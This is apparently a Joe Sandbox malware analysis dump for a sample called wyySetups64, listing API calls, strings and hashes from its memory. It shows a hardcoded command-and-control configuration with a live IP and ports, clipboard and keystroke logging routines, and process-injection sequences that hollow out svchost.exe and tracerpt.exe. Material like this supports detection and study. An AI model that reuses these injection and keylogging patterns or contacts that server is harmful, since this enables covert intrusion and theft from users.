                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1828324828-0
                                                                                                                                                                                                              • Opcode ID: d86e74617e6f8d7d1de0c045d897513e0946b43d2dfda05b5d89c860e4d5fa54
                                                                                                                                                                                                              • Instruction ID: 74419caf2fd1f02e4679840879c38ff200e1b3986d3031dc097da584838437b6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d86e74617e6f8d7d1de0c045d897513e0946b43d2dfda05b5d89c860e4d5fa54
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65E01239C42B11D7DA2AFBE1B6C3A0CB264ABD4F35F90425AE6901A4A4DA740281C652
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenW.KERNEL32(|p1:118.107.44.219|o1:19091|t1:1|p2:118.107.44.219|o2:19092|t2:1|p3:118.107.44.219|o3:19093|t3:1|dd:1|cl:1|fz:), ref: 00BD4755
                                                                                                                                                                                                                • Part of subcall function 00BD3260: __wcsrev.LIBCMT ref: 00BF0655
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • |p1:118.107.44.219|o1:19091|t1:1|p2:118.107.44.219|o2:19092|t2:1|p3:118.107.44.219|o3:19093|t3:1|dd:1|cl:1|fz:, xrefs: 00BD4750
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __wcsrevlstrlen
                                                                                                                                                                                                              • String ID: |p1:118.107.44.219|o1:19091|t1:1|p2:118.107.44.219|o2:19092|t2:1|p3:118.107.44.219|o3:19093|t3:1|dd:1|cl:1|fz:
                                                                                                                                                                                                              • API String ID: 4062721203-291094236
                                                                                                                                                                                                              • Opcode ID: abfa737bd7f3f453da1e4514bc96f43f2de69a812b71007a441ec641ac519b49
                                                                                                                                                                                                              • Instruction ID: 175ee2a8b060f1f68d3ee62f2ea3c65aa360e8dcf10e314102cb079919e08129
                                                                                                                                                                                                              • Opcode Fuzzy Hash: abfa737bd7f3f453da1e4514bc96f43f2de69a812b71007a441ec641ac519b49
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DAC08C7224924CCFE75033E9944863C73D8EB33B15F2040B2F600CA1A3EA518D40A3F2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(80000001,03376E9A), ref: 03376EC9
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(75BF73E0), ref: 03376ED2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3535843008-0
                                                                                                                                                                                                              • Opcode ID: 3fd0cba92d6abb7bf20c9cec864890de64bf551c33ae8e03bdaac398c8e3197c
                                                                                                                                                                                                              • Instruction ID: 2177e8d8cc54574c55f1a3a50c6800315c51d51f41b163cf21a968450e4efa7a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3fd0cba92d6abb7bf20c9cec864890de64bf551c33ae8e03bdaac398c8e3197c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CC04C72D01428A7CA10E7A4ED4494A77B85B4C210F1144C2A104A3118C634AD418F90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Open
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 71445658-0
                                                                                                                                                                                                              • Opcode ID: 00879f064e431ff0885dc97872b2122b73962f6fc304e0e7c3a0dba9718d49b2
                                                                                                                                                                                                              • Instruction ID: 898f734d9025a8aab9fe8ffc02bb070996b25d4407cf5f7c596949039e5d62ef
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 00879f064e431ff0885dc97872b2122b73962f6fc304e0e7c3a0dba9718d49b2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29E0927490868AEACF14CB41D5C4BFDB3F1AB50709F3081D6E0066B195E7742F04AA95
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3660427363-0
                                                                                                                                                                                                              • Opcode ID: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
                                                                                                                                                                                                              • Instruction ID: eb78ba79ccf90db25eb61fc7af5d6e036378ae6d5401bc9adc19c0888ca777ec
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85C08C20C4CBDFE184216E171C899B8F3E0C704715F3009F3A80B216C1B3A429907AEA
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BEFAB1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2882836952-0
                                                                                                                                                                                                              • Opcode ID: 01212006b036d606ac69cc9549f45ea7673dc217769b24f04f9868a66ef88036
                                                                                                                                                                                                              • Instruction ID: bf50494997d9385a8439893f6c172e9c0476824219c7babe52dc7bdd103cf930
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01212006b036d606ac69cc9549f45ea7673dc217769b24f04f9868a66ef88036
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30D012B4104942C7D310AB56C5C462AB3E1BF84300F30C975E61A97711C734EC419652
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00006110,00000000), ref: 00BF0693
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2422867632-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: send
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2809346765-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • Sleep.KERNEL32 ref: 00BD5EB2
                                                                                                                                                                                                                • Part of subcall function 00BD6F17: _malloc.LIBCMT ref: 00BD6F31
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Sleep_malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 617756273-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337E8A9
                                                                                                                                                                                                              • Sleep.KERNEL32(00000001,?,?,?,0337604D), ref: 0337E8B3
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0337E8BF
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0337E8D2
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(033A1F08,00000000), ref: 0337E8DA
                                                                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 0337E8E2
                                                                                                                                                                                                              • GetClipboardData.USER32(0000000D), ref: 0337E8EA
                                                                                                                                                                                                              • GlobalSize.KERNEL32(00000000), ref: 0337E8FB
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0337E90C
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0337E985
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337E9A3
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0337E9AC
                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 0337E9B2
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0337E9CA
                                                                                                                                                                                                              • CreateFileW.KERNEL32(033A0D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 0337E9E4
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0337EA02
                                                                                                                                                                                                              • lstrlenW.KERNEL32(03395B48,?,00000000), ref: 0337EA16
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,03395B48,00000000), ref: 0337EA25
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0337EA2C
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0337EA38
                                                                                                                                                                                                              • GetKeyState.USER32(00000014), ref: 0337EABC
                                                                                                                                                                                                              • lstrlenW.KERNEL32(0339B4A8), ref: 0337EB0B
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0337EB1D
                                                                                                                                                                                                              • lstrlenW.KERNEL32(0339B4D0), ref: 0337EB3E
                                                                                                                                                                                                              • lstrlenW.KERNEL32(0339B4D0), ref: 0337EB61
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0337EB7F
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0337EB95
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0337EBBF
                                                                                                                                                                                                              • lstrlenW.KERNEL32(00000000), ref: 0337EC0B
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0337EC21
                                                                                                                                                                                                              • CreateFileW.KERNEL32(033A0D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 0337EC3B
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0337EC59
                                                                                                                                                                                                              • lstrlenW.KERNEL32(00000000,?,00000000), ref: 0337EC69
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0337EC74
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0337EC7B
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0337EC88
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Filelstrlen$wsprintf$ClipboardCloseGlobal$CountCreateHandleMutexObjectPointerReleaseSingleTickWaitWrite_memset$DataExchangeInterlockedLockOpenSizeSleepStateUnlock
                                                                                                                                                                                                              • String ID: [$%s%s$%s%s$%s%s$[esc]
                                                                                                                                                                                                              • API String ID: 1637302245-2373594894
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03377804
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03377850
                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 03377864
                                                                                                                                                                                                                • Part of subcall function 03378720: _vswprintf_s.LIBCMT ref: 03378731
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03377893
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000214,00000000,00000000,00000044,?), ref: 033778DA
                                                                                                                                                                                                                • Part of subcall function 03377740: GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,033778FC), ref: 03377756
                                                                                                                                                                                                                • Part of subcall function 03377740: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,033778FC,?,?,?,?,?,?,74DF0630), ref: 0337775D
                                                                                                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 0337790A
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03377923
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Kernel32.dll,OpenProcess,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 0337793B
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 03377944
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Kernel32.dll,ExitProcess,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03377956
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 03377959
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Kernel32.dll,WinExec,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 0337796B
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0337796E
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Kernel32.dll,WaitForSingleObject,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03377980
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 03377983
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 0337798B
                                                                                                                                                                                                              • GetProcessId.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03377992
                                                                                                                                                                                                              • _memset.LIBCMT ref: 033779B4
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,000000FA,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 033779CA
                                                                                                                                                                                                              • VirtualAllocEx.KERNEL32(00000000,00000000,00000118,00003000,00000040), ref: 033779FF
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000118,00000000), ref: 03377A1B
                                                                                                                                                                                                              • VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000001,?), ref: 03377A43
                                                                                                                                                                                                              • VirtualAllocEx.KERNEL32(00000000,00000000,00001000,00003000,00000040), ref: 03377A58
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,033776F0,00001000,00000000), ref: 03377A72
                                                                                                                                                                                                              • VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000001,00000000), ref: 03377A90
                                                                                                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000), ref: 03377AA1
                                                                                                                                                                                                              • Sleep.KERNEL32(0000EA60,?,?,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 03377ABA
                                                                                                                                                                                                              • VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000040,00000000), ref: 03377AD6
                                                                                                                                                                                                              • VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000040,00000000), ref: 03377AE8
                                                                                                                                                                                                              • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 03377AF1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$Virtual$AddressLibraryLoadProcProtect_memset$AllocCreateCurrentFileMemoryOpenThreadWrite$AttributesDirectoryModuleNameRemoteResumeSleepSystemToken_vswprintf_s
                                                                                                                                                                                                              • String ID: %s%s$D$ExitProcess$Kernel32.dll$OpenProcess$WaitForSingleObject$WinExec$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
                                                                                                                                                                                                              • API String ID: 4176418925-3213446972
                                                                                                                                                                                                              • Opcode ID: 5dcc190ed11a8968de65ead4ec104ff1aab7f8516dddcbf1e59f145f84e3e168
                                                                                                                                                                                                              • Instruction ID: ef2c79e3460f971d2dbe383eea8204d6f267f4514c9ff1006419ea8390f002bc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5dcc190ed11a8968de65ead4ec104ff1aab7f8516dddcbf1e59f145f84e3e168
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C81AB71A40318BBEB31EB65DCC6FEF777CAF55B01F000499F208A6181DAB59A85CB64
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00BD5849
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00BD5868
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00BD589D
                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 00BD58B1
                                                                                                                                                                                                                • Part of subcall function 00BD59E0: _vswprintf_s.LIBCMT ref: 00BD59F1
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 00BD58E0
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 00BD5928
                                                                                                                                                                                                              • VirtualAllocEx.KERNEL32(?,00000000,000311BF,00003000,00000040,74DF0630), ref: 00BD594E
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 00BD5968
                                                                                                                                                                                                              • GetThreadContext.KERNEL32(?,?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 00BD5987
                                                                                                                                                                                                              • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 00BD59A2
                                                                                                                                                                                                              • ResumeThread.KERNEL32(?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 00BD59C1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                                                                                                                                                                                              • String ID: %s%s$D$Windows\SysWOW64\tracerpt.exe$Windows\System32\tracerpt.exe
                                                                                                                                                                                                              • API String ID: 2170139861-1986163084
                                                                                                                                                                                                              • Opcode ID: 7f357ba072bc857090fd5b0fbbb14f07b3d2abcfd96e757d81b72d703a432c45
                                                                                                                                                                                                              • Instruction ID: 11d5d3ca9b450deea00908394bcddca610665518a035eaf375c5d9b037f645d5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f357ba072bc857090fd5b0fbbb14f07b3d2abcfd96e757d81b72d703a432c45
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B84187B0A40348ABD730DF60DC95FAAB7F8EF54704F1045DDB64DAB281EBB49A848B54
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03377E73
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03377E9F
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03377ED4
                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 03377EE8
                                                                                                                                                                                                                • Part of subcall function 03378720: _vswprintf_s.LIBCMT ref: 03378731
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 03377F15
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 03377F65
                                                                                                                                                                                                              • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 03377F92
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00003000,00000040), ref: 03377FAA
                                                                                                                                                                                                              • GetThreadContext.KERNEL32(?,?,?,00000000,?,00003000,00000040), ref: 03377FCC
                                                                                                                                                                                                              • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,00003000,00000040), ref: 03377FEA
                                                                                                                                                                                                              • ResumeThread.KERNEL32(?,?,00000000,?,00003000,00000040), ref: 03377FFF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                                                                                                                                                                                              • String ID: %s%s$D$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
                                                                                                                                                                                                              • API String ID: 2170139861-2473635271
                                                                                                                                                                                                              • Opcode ID: fbcdf503b7dbf8d565d2570f6e828b915fdf3b041ef2bec219243f37c7cdfb86
                                                                                                                                                                                                              • Instruction ID: 0efddd24823af2a794ab3ab07f217c9a31700f6e9cf7aec40db31b292e8333da
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fbcdf503b7dbf8d565d2570f6e828b915fdf3b041ef2bec219243f37c7cdfb86
